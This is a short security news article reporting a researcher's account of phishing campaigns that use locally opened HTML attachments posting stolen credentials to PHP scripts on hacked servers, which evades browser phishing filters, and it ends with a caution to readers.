Next-generation phishing HTML scam dissected

According to Rodel Mendrez, in a traditional phishing email, the hacker sets up a website with a fake login form imitating a legitimate online service, such as a bank.

Phishers, he says, have discovered ways of circumventing the in-browser phishing detection systems seen on Firefox and Chrome, by attaching an HTML file to the spam email.

"This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser", he notes in his security blog.

In use, says Mendrez, the HTML attachment, stored locally, successfully opens in the browser without the user being warned.

"When the victims enter their information and click the `Agree and Submit' button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver", he says.

And here's where it gets interesting, Infosecurity notes, as whilst the resultant POST request sends information to the phisher's remote web server, Chrome and Firefox do not detect any malicious activity.

So what makes this type of phishing tactic harder to detect from the browser perspective, asks Mendrez.

The reasons, he says, are that few PHP URLs are reported as abuse and that the URLs are difficult to be verified as phishing sites.

"The URL alone – without the accompanying HTML form – would be hard to verify as a phish site because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting the browser elsewhere to the target brand's homepage", he says.

Mendrez concludes that his team has seen an increase in these types of phishing spam campaigns over the last few months and, as a result, advises caution when encountering any HTML form asking for sensitive information.

What’s Hot on Infosecurity Magazine?